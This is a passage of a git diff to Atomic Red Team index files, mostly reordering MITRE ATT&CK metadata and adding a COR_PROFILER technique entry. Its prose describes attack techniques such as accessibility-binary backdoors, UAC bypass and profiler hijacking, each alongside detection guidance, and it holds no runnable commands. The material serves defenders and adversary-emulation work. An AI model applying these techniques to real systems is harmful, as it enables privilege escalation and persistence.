+| | | | | Run Virtual Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | [Rundll32](../../T1218.011/T1218.011.md) | | | | | | | |
| | | | | SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
@@ -97,8 +102,9 @@
| | | | | Thread Execution Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Thread Local Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | | | [Timestomp](../../T1551.006/T1551.006.md) | | | | | | | |
+| | | | | [Timestomp](../../T1070.006/T1070.006.md) | | | | | | | |
| | | | | Token Impersonation/Theft [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+| | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Trusted Developer Utilities Proxy Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 1daa1311..0bd2210f 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -31,24 +31,24 @@ privilege-escalation:
phase_name: persistence
modified: '2020-03-24T16:28:04.990Z'
created: '2020-01-24T14:13:45.936Z'
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_data_sources:
- - Process use of network
- - Process command-line parameters
- - Process monitoring
- - File monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ - Administrator
x_mitre_detection: While users may customize their ~/.bashrc and
~/.bash_profile files , there are only certain types of commands
that typically appear in these files. Monitor for abnormal commands such as
execution of unknown programs, opening network sockets, or reaching out across
the network when user profiles are loaded during the login process.
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process use of network
+ - Process command-line parameters
+ - Process monitoring
+ - File monitoring
+ x_mitre_platforms:
+ - Linux
+ - macOS
identifier: T1546.004
atomic_tests:
- name: Add command to .bash_profile
@@ -111,14 +111,17 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-27T12:18:44.286Z'
+ modified: '2020-06-25T19:57:54.923Z'
created: '2020-01-30T13:58:14.373Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_is_subtechnique: false
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Windows Registry
+ - File monitoring
+ - Process command-line parameters
+ - API monitoring
+ - Process monitoring
+ x_mitre_permissions_required:
+ - Administrator
+ - User
x_mitre_detection: |-
Monitor the file system for files that have the setuid or setgid bits set. Also look for any process API calls for behavior that may be indicative of [Process Injection](https://attack.mitre.org/techniques/T1055) and unusual loaded DLLs through [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), which indicate attempts to gain access to higher privileged processes. On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo).
@@ -127,15 +130,12 @@ privilege-escalation:
On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo). This technique is abusing normal functionality in macOS and Linux systems, but sudo has the ability to log all input and output based on the LOG_INPUT and LOG_OUTPUT directives in the /etc/sudoers file.
There are many ways to perform UAC bypasses when a user is in the local administrator group on a system, so it may be difficult to target detection on all variations. Efforts should likely be placed on mitigation and collecting enough information on process launches and actions that could be performed before and after a UAC bypass is performed. Some UAC bypass methods rely on modifying specific, user-accessible Registry settings. Analysts should monitor Registry settings for unauthorized changes.
- x_mitre_permissions_required:
- - Administrator
- - User
- x_mitre_data_sources:
- - Windows Registry
- - File monitoring
- - Process command-line parameters
- - API monitoring
- - Process monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1134:
technique:
@@ -184,15 +184,28 @@ privilege-escalation:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-03-26T21:55:15.343Z'
+ modified: '2020-04-16T19:37:02.355Z'
created: '2017-12-14T16:46:06.044Z'
- x_mitre_platforms:
- - Windows
- x_mitre_effective_permissions:
- - SYSTEM
- x_mitre_permissions_required:
- - User
- - Administrator
+ x_mitre_defense_bypassed:
+ - Windows User Account Control
+ - System access controls
+ - File system access controls
+ - Heuristic Detection
+ - Host forensic analysis
+ x_mitre_is_subtechnique: false
+ x_mitre_version: '2.0'
+ x_mitre_contributors:
+ - Tom Ueltschi @c_APT_ure
+ - Travis Smith, Tripwire
+ - Robby Winchester, @robwinchester3
+ - Jared Atkinson, @jaredcatkinson
+ x_mitre_data_sources:
+ - Authentication logs
+ - Windows event logs
+ - API monitoring
+ - Access tokens
+ - Process monitoring
+ - Process command-line parameters
x_mitre_detection: "If an adversary is using a standard command-line shell,
analysts can detect token manipulation by auditing command-line activity.
Specifically, analysts should look for use of the runas command.
@@ -214,26 +227,13 @@ privilege-escalation:
and ParentProcessID (which are also produced from ETW and other utilities
such as Task Manager and Process Explorer). The ETW provided EventHeader ProcessId
identifies the actual parent process."
- x_mitre_data_sources:
- - Authentication logs
- - Windows event logs
- - API monitoring
- - Access tokens
- - Process monitoring
- - Process command-line parameters
- x_mitre_contributors:
- - Tom Ueltschi @c_APT_ure
- - Travis Smith, Tripwire
- - Robby Winchester, @robwinchester3
- - Jared Atkinson, @jaredcatkinson
- x_mitre_version: '2.0'
- x_mitre_is_subtechnique: false
- x_mitre_defense_bypassed:
- - Windows User Account Control
- - System access controls
- - File system access controls
- - Heuristic Detection
- - Host forensic analysis
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ x_mitre_effective_permissions:
+ - SYSTEM
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1546.008:
technique:
@@ -245,8 +245,8 @@ privilege-escalation:
source_name: capec
url: https://capec.mitre.org/data/definitions/558.html
- url: https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-1.html
- description: 'Glyer, C., Kazanciyan, R. (2012, August 20). THE “HIKIT” ROOTKIT:
- ADVANCED AND PERSISTENT ATTACK TECHNIQUES (PART 1). Retrieved June 6, 2016.'
+ description: 'Glyer, C., Kazanciyan, R. (2012, August 20). The “Hikit” Rootkit:
+ Advanced and Persistent Attack Techniques (Part 1). Retrieved June 6, 2016.'
source_name: FireEye Hikit Rootkit
- url: https://www.slideshare.net/DennisMaldonado5/sticky-keys-to-the-kingdom
description: Maldonado, D., McGuffin, T. (2016, August 6). Sticky Keys to
@@ -256,6 +256,10 @@ privilege-escalation:
description: Tilbury, C. (2014, August 28). Registry Analysis with CrowdResponse.
Retrieved November 12, 2014.
source_name: Tilbury 2014
+ - source_name: Narrator Accessibility Abuse
+ url: https://giuliocomi.blogspot.com/2019/10/abusing-windows-10-narrators-feedback.html
+ description: Comi, G. (2019, October 19). Abusing Windows 10 Narrator's 'Feedback-Hub'
+ URI for Fileless Persistence. Retrieved April 28, 2020.
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
@@ -269,7 +273,7 @@ privilege-escalation:
For simple binary replacement on Windows XP and later as well as and Windows Server 2003/R2 and later, for example, the program (e.g., C:\Windows\System32\utilman.exe) may be replaced with "cmd.exe" (or another program that provides backdoor access). Subsequently, pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the replaced file to be executed with SYSTEM privileges. (Citation: Tilbury 2014)
- Other accessibility features exist that may also be leveraged in a similar fashion: (Citation: DEFCON2016 Sticky Keys)
+ Other accessibility features exist that may also be leveraged in a similar fashion: (Citation: DEFCON2016 Sticky Keys)(Citation: Narrator Accessibility Abuse)
* On-Screen Keyboard: C:\Windows\System32\osk.exe
* Magnifier: C:\Windows\System32\Magnify.exe
@@ -283,29 +287,29 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
- modified: '2020-03-24T19:11:19.022Z'
+ modified: '2020-05-13T20:37:30.048Z'
created: '2020-01-24T14:32:40.315Z'
- x_mitre_platforms:
- - Windows
- x_mitre_contributors:
- - Paul Speulstra, AECOM Global Security Operations Center
- x_mitre_data_sources:
- - Process command-line parameters
- - Process monitoring
- - File monitoring
- - Windows Registry
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_effective_permissions:
+ - SYSTEM
+ x_mitre_permissions_required:
+ - Administrator
x_mitre_detection: Changes to accessibility utility binaries or binary paths
that do not correlate with known software, patch cycles, etc., are suspicious.
Command line invocation of tools capable of modifying the Registry for associated
keys are also suspicious. Utility arguments and the binaries themselves should
be monitored for changes. Monitor Registry keys within HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options.
- x_mitre_permissions_required:
- - Administrator
- x_mitre_effective_permissions:
- - SYSTEM
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Process monitoring
+ - File monitoring
+ - Windows Registry
+ x_mitre_contributors:
+ - Paul Speulstra, AECOM Global Security Operations Center
+ x_mitre_platforms:
+ - Windows
identifier: T1546.008
atomic_tests:
- name: Attaches Command Prompt as a Debugger to a List of Target Processes
@@ -395,13 +399,14 @@ privilege-escalation:
phase_name: persistence
modified: '2020-03-24T20:22:45.298Z'
created: '2020-01-24T14:47:41.795Z'
- x_mitre_platforms:
- - Windows
- x_mitre_data_sources:
- - Windows Registry
- - Process command-line parameters
- - Process monitoring
- - Loaded DLLs
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_effective_permissions:
+ - Administrator
+ - SYSTEM
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
x_mitre_detection: "Monitor DLL loads by processes, specifically looking for
DLLs that are not recognized or not normally loaded into a process. Monitor
the AppCertDLLs Registry value for modifications that do not correlate with
@@ -415,14 +420,13 @@ privilege-escalation:
but as part of a chain of behavior that could lead to other activities, such
as making network connections for Command and Control, learning details about
the environment through Discovery, and conducting Lateral Movement."
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- x_mitre_effective_permissions:
- - Administrator
- - SYSTEM
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Windows Registry
+ - Process command-line parameters
+ - Process monitoring
+ - Loaded DLLs
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1546.010:
technique:
@@ -474,13 +478,15 @@ privilege-escalation:
phase_name: persistence
modified: '2020-03-24T20:34:09.996Z'
created: '2020-01-24T14:52:25.589Z'
- x_mitre_platforms:
- - Windows
- x_mitre_data_sources:
- - Windows Registry
- - Process command-line parameters
- - Process monitoring
- - Loaded DLLs
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_system_requirements:
+ - Secure boot disabled on systems running Windows 8 and later
+ x_mitre_effective_permissions:
+ - Administrator
+ - SYSTEM
+ x_mitre_permissions_required:
+ - Administrator
x_mitre_detection: "Monitor DLL loads by processes that load user32.dll and
look for DLLs that are not recognized or not normally loaded into a process.
Monitor the AppInit_DLLs Registry values for modifications that do not correlate
@@ -495,15 +501,13 @@ privilege-escalation:
lead to other activities, such as making network connections for Command and
Control, learning details about the environment through Discovery, and conducting
Lateral Movement."
- x_mitre_permissions_required:
- - Administrator
- x_mitre_effective_permissions:
- - Administrator
- - SYSTEM
- x_mitre_system_requirements:
- - Secure boot disabled on systems running Windows 8 and later
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Windows Registry
+ - Process command-line parameters
+ - Process monitoring
+ - Loaded DLLs
+ x_mitre_platforms:
+ - Windows
identifier: T1546.010
atomic_tests:
- name: Install AppInit Shim
@@ -567,6 +571,10 @@ privilege-escalation:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Endgame Process Injection July 2017
+ - source_name: FireEye Application Shimming
+ url: http://files.brucon.org/2015/Tomczak_and_Ballenthin_Shims_for_the_Win.pdf
+ description: Ballenthin, W., Tomczak, J.. (2015). The Real Shim Shary. Retrieved
+ May 4, 2020.
- url: https://www.blackhat.com/docs/eu-15/materials/eu-15-Pierce-Defending-Against-Malicious-Application-Compatibility-Shims-wp.pdf
description: Pierce, Sean. (2015, November). Defending Against Malicious Application
Compatibility Shims. Retrieved June 22, 2017.
@@ -599,9 +607,9 @@ privilege-escalation:
Execution Prevention (DisableNX) and Structure Exception Handling (DisableSEH),
and intercept memory addresses (GetProcAddress).\n\nUtilizing these shims
may allow an adversary to perform several malicious acts such as elevate privileges,
- install backdoors, disable defenses like Windows Defender, etc. Shims can
- also be abused to establish persistence by continuously being invoked by affected
- programs."
+ install backdoors, disable defenses like Windows Defender, etc. (Citation:
+ FireEye Application Shimming) Shims can also be abused to establish persistence
+ by continuously being invoked by affected programs."
id: attack-pattern--42fe883a-21ea-4cfb-b94a-78b6476dcc83
type: attack-pattern
kill_chain_phases:
@@ -609,14 +617,12 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
- modified: '2020-03-24T21:28:29.648Z'
+ modified: '2020-05-04T19:05:30.140Z'
created: '2020-01-24T14:56:24.231Z'
- x_mitre_platforms:
- - Windows
- x_mitre_data_sources:
- - Process command-line parameters
- - Process monitoring
- - Windows Registry
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
x_mitre_detection: |-
There are several public tools available that will detect shims that are currently available (Citation: Black Hat 2015 App Shim):
@@ -627,10 +633,12 @@ privilege-escalation:
* ShimCacheMem - Volatility plug-in that pulls shim cache from memory (note: shims are only cached after reboot)
Monitor process execution for sdbinst.exe and command-line arguments for potential indications of application shim abuse.
- x_mitre_permissions_required:
- - Administrator
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Process monitoring
+ - Windows Registry
+ x_mitre_platforms:
+ - Windows
identifier: T1546.011
atomic_tests:
- name: Application Shim Installation
@@ -765,12 +773,14 @@ privilege-escalation:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-03-23T13:20:55.893Z'
+ modified: '2020-06-20T22:17:05.394Z'
created: '2020-01-14T01:29:43.786Z'
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_defense_bypassed:
+ - Application control
+ - Anti-virus
+ x_mitre_data_sources:
+ - Process monitoring
+ - API monitoring
x_mitre_detection: "Monitoring Windows API calls indicative of the various types
of code injection may generate a significant amount of data and may not be
directly useful for defense unless collected under specific circumstances
@@ -783,12 +793,10 @@ privilege-escalation:
process behavior to determine if a process is performing actions it usually
does not, such as opening network connections, reading files, or other suspicious
actions that could relate to post-compromise behavior. "
- x_mitre_data_sources:
- - Process monitoring
- - API monitoring
- x_mitre_defense_bypassed:
- - Process whitelisting
- - Anti-virus
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
identifier: T1055.004
atomic_tests:
- name: Process Injection via C#
@@ -842,11 +850,9 @@ privilege-escalation:
phase_name: privilege-escalation
modified: '2020-03-23T22:35:13.112Z'
created: '2019-12-03T12:59:36.749Z'
- x_mitre_platforms:
- - Linux
- x_mitre_data_sources:
- - Process command-line parameters
- - Process monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_remote_support: true
x_mitre_detection: "Monitor scheduled task creation using command-line invocation.
Legitimate scheduled tasks may be created during installation of new software
or through system administration functions. Look for changes to tasks that
@@ -857,9 +863,11 @@ privilege-escalation:
could lead to other activities, such as network connections made for Command
and Control, learning details about the environment through Discovery, and
Lateral Movement."
- x_mitre_remote_support: true
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Process monitoring
+ x_mitre_platforms:
+ - Linux
atomic_tests: []
T1053.002:
technique:
@@ -914,8 +922,16 @@ privilege-escalation:
phase_name: privilege-escalation
modified: '2020-03-24T13:43:40.776Z'
created: '2019-11-27T13:52:45.853Z'
- x_mitre_platforms:
- - Windows
+ x_mitre_data_sources:
+ - File monitoring
+ - Process command-line parameters
+ - Process monitoring
+ - Windows event logs
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_remote_support: true
+ x_mitre_permissions_required:
+ - Administrator
x_mitre_detection: |-
Monitor process execution from the svchost.exe in Windows 10 and the Windows Task Scheduler taskeng.exe for older versions of Windows. (Citation: Twitter Leoloobeek Scheduled Task) If scheduled tasks are not used for persistence, then the adversary is likely to remove the task when the action is complete. Monitor Windows Task Scheduler stores in %systemroot%\System32\Tasks for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc.
@@ -931,16 +947,8 @@ privilege-escalation:
Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current scheduled tasks. (Citation: TechNet Autoruns)
Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Tasks may also be created through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data.
- x_mitre_permissions_required:
- - Administrator
- x_mitre_remote_support: true
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_data_sources:
- - File monitoring
- - Process command-line parameters
- - Process monitoring
- - Windows event logs
+ x_mitre_platforms:
+ - Windows
identifier: T1053.002
atomic_tests:
- name: At.exe Scheduled task
@@ -993,22 +1001,22 @@ privilege-escalation:
phase_name: privilege-escalation
modified: '2020-03-25T15:11:25.821Z'
created: '2020-01-24T14:54:42.757Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_permissions_required:
- - Administrator
+ x_mitre_platforms:
+ - Windows
+ x_mitre_data_sources:
+ - DLL monitoring
+ - Windows Registry
+ - Loaded DLLs
x_mitre_detection: 'Monitor the Registry for changes to the LSA Registry keys.
Monitor the LSA process for DLL loads. Windows 8.1 and Windows Server 2012
R2 may generate events when unsigned DLLs try to load into the LSA by setting
the Registry key HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\LSASS.exe with AuditLevel = 8. (Citation: Graeber
2014) (Citation: Microsoft Configure LSA)'
- x_mitre_data_sources:
- - DLL monitoring
- - Windows Registry
- - Loaded DLLs
- x_mitre_platforms:
- - Windows
+ x_mitre_permissions_required:
+ - Administrator
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
atomic_tests: []
T1547:
technique:
@@ -1054,12 +1062,14 @@ privilege-escalation:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-03-25T19:47:43.546Z'
+ modified: '2020-06-30T21:23:15.683Z'
created: '2020-01-23T17:46:59.535Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ - root
x_mitre_detection: "Monitor for additions or modifications of mechanisms that
could be used to trigger autostart execution, such as relevant additions to
the Registry. Look for changes that are not correlated with known updates,
@@ -1078,12 +1088,10 @@ privilege-escalation:
Look for abnormal process behavior that may be due to a process loading a
malicious DLL.\n\nMonitor for abnormal usage of utilities and command-line
parameters involved in kernel modification or driver installation."
- x_mitre_permissions_required:
- - User
- - Administrator
- - root
- x_mitre_is_subtechnique: false
- x_mitre_version: '1.0'
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1037:
technique:
@@ -1117,22 +1125,37 @@ privilege-escalation:
phase_name: privilege-escalation
modified: '2020-03-27T16:49:15.953Z'
created: '2017-05-31T21:30:38.910Z'
- x_mitre_version: '2.0'
- x_mitre_data_sources:
- - File monitoring
- - Process monitoring
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - macOS
+ - Windows
x_mitre_detection: Monitor logon scripts for unusual access by abnormal users
or at abnormal times. Look for files added or modified by unusual accounts
outside of normal administration duties. Monitor running process for actions
that could be indicative of abnormal programs or executables running upon
logon.
- x_mitre_platforms:
- - macOS
- - Windows
- x_mitre_is_subtechnique: false
+ x_mitre_data_sources:
+ - File monitoring
+ - Process monitoring
+ x_mitre_version: '2.0'
atomic_tests: []
T1548.002:
technique:
+ id: attack-pattern--120d5519-3098-4e1c-9191-2aa61232f073
+ description: |-
+ Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action. (Citation: TechNet How UAC Works)
+
+ If the UAC protection level of a computer is set to anything but the highest level, certain Windows programs can elevate privileges or execute some elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) objects without prompting the user through the UAC notification box. (Citation: TechNet Inside UAC) (Citation: MSDN COM Elevation) An example of this is use of [Rundll32](https://attack.mitre.org/techniques/T1218/011) to load a specifically crafted DLL which loads an auto-elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.(Citation: Davidson Windows)
+
+ Many methods have been discovered to bypass UAC. The Github readme page for UACME contains an extensive list of methods(Citation: Github UACMe) that have been discovered and implemented, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as:
+
+ * eventvwr.exe can auto-elevate and execute a specified binary or script.(Citation: enigma0x3 Fileless UAC Bypass)(Citation: Fortinet Fareit)
+
+ Another bypass is possible through some lateral movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on remote systems and default to high integrity.(Citation: SANS UAC Bypass)
+ name: Bypass User Access Control
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1548.002
@@ -1176,28 +1199,13 @@ privilege-escalation:
description: Nelson, M. (2017, March 17). "Fileless" UAC Bypass Using sdclt.exe.
Retrieved May 25, 2017.
source_name: enigma0x3 sdclt bypass
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Bypass User Access Control
- description: |-
- Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action. (Citation: TechNet How UAC Works)
-
- If the UAC protection level of a computer is set to anything but the highest level, certain Windows programs can elevate privileges or execute some elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) objects without prompting the user through the UAC notification box. (Citation: TechNet Inside UAC) (Citation: MSDN COM Elevation) An example of this is use of [Rundll32](https://attack.mitre.org/techniques/T1218/011) to load a specifically crafted DLL which loads an auto-elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.(Citation: Davidson Windows)
-
- Many methods have been discovered to bypass UAC. The Github readme page for UACME contains an extensive list of methods(Citation: Github UACMe) that have been discovered and implemented, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as:
-
- * eventvwr.exe can auto-elevate and execute a specified binary or script.(Citation: enigma0x3 Fileless UAC Bypass)(Citation: Fortinet Fareit)
-
- Another bypass is possible through some lateral movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on remote systems and default to high integrity.(Citation: SANS UAC Bypass)
- id: attack-pattern--120d5519-3098-4e1c-9191-2aa61232f073
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-27T12:11:48.618Z'
+ modified: '2020-06-25T19:57:54.510Z'
created: '2020-01-30T14:24:34.977Z'
x_mitre_platforms:
- Windows
@@ -1386,8 +1394,121 @@ privilege-escalation:
'
name: powershell
+ T1574.012:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1574.012
+ url: https://attack.mitre.org/techniques/T1574/012
+ - source_name: Microsoft Profiling Mar 2017
+ url: https://docs.microsoft.com/en-us/dotnet/framework/unmanaged-api/profiling/profiling-overview
+ description: Microsoft. (2017, March 30). Profiling Overview. Retrieved June
+ 24, 2020.
+ - source_name: Microsoft COR_PROFILER Feb 2013
+ url: https://docs.microsoft.com/en-us/previous-versions/dotnet/netframework-4.0/ee471451(v=vs.100)
+ description: Microsoft. (2013, February 4). Registry-Free Profiler Startup
+ and Attach. Retrieved June 24, 2020.
+ - source_name: RedCanary Mockingbird May 2020
+ url: https://redcanary.com/blog/blue-mockingbird-cryptominer/
+ description: Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved
+ May 26, 2020.
+ - source_name: Red Canary COR_PROFILER May 2020
+ url: https://redcanary.com/blog/cor_profiler-for-persistence/
+ description: Brown, J. (2020, May 7). Detecting COR_PROFILER manipulation
+ for persistence. Retrieved June 24, 2020.
+ - source_name: Almond COR_PROFILER Apr 2019
+ url: https://offsec.almond.consulting/UAC-bypass-dotnet.html
+ description: Almond. (2019, April 30). UAC bypass via elevated .NET applications.
+ Retrieved June 24, 2020.
+ - source_name: GitHub OmerYa Invisi-Shell
+ url: https://github.com/OmerYa/Invisi-Shell
+ description: Yair, O. (2019, August 19). Invisi-Shell. Retrieved June 24,
+ 2020.
+ - source_name: subTee .NET Profilers May 2017
+ url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
+ description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET
+ Profilers. Retrieved June 24, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: COR_PROFILER
+ description: |-
+ Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profiliers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
+
+ The COR_PROFILER environment variable can be set at various scopes (system, user, or process) resulting in different levels of influence. System and user-wide environment variable scopes are specified in the Registry, where a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) object can be registered as a profiler DLL. A process scope COR_PROFILER can also be created in-memory without modifying the Registry. Starting with .NET Framework 4, the profiling DLL does not need to be registered as long as the location of the DLL is specified in the COR_PROFILER_PATH environment variable.(Citation: Microsoft COR_PROFILER Feb 2013)
+
+ Adversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. The COR_PROFILER can also be used to elevate privileges (ex: [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002)) if the victim .NET process executes at a higher permission level, as well as to hook and [Impair Defenses](https://attack.mitre.org/techniques/T1562) provided by .NET processes.(Citation: RedCanary Mockingbird May 2020)(Citation: Red Canary COR_PROFILER May 2020)(Citation: Almond COR_PROFILER Apr 2019)(Citation: GitHub OmerYa Invisi-Shell)(Citation: subTee .NET Profilers May 2017)
+ id: attack-pattern--ffeb0780-356e-4261-b036-cfb6bd234335
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ modified: '2020-06-26T16:09:58.920Z'
+ created: '2020-06-24T22:30:55.843Z'
+ x_mitre_detection: 'For detecting system and user scope abuse of the COR_PROFILER,
+ monitor the Registry for changes to COR_ENABLE_PROFILING, COR_PROFILER, and
+ COR_PROFILER_PATH that correspond to system and user environment variables
+ that do not correlate to known developer tools. Extra scrutiny should be placed
+ on suspicious modification of these Registry keys by command line tools like
+ wmic.exe, setx.exe, and [Reg](https://attack.mitre.org/software/S0075), monitoring
+ for command-line arguments indicating a change to COR_PROFILER variables may
+ aid in detection. For system, user, and process scope abuse of the COR_PROFILER,
